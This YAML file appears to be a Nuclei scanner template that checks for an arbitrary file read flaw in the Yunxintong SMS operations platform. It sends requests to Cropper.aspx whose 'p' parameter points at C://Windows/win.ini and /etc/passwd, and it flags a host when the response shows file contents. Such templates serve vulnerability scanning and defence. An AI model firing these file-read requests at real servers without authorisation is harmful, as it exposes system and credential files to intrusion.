id: yunxintong-fileRead

info:
  name: 云信通短信运营管理平台 Cropper.aspx 文件 p 参数任意文件读取漏洞
  author: Str1am
  severity: high
  tags: yunxintong,fileRead

requests:
  - method: GET
    path:
      - "{{BaseURL}}/Cropper.aspx?p=C://Windows/win.ini"
      - "{{BaseURL}}/Cropper.aspx?p=/etc/passwd"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "extensions"
          - "root:x"
        part: body
        condition: or
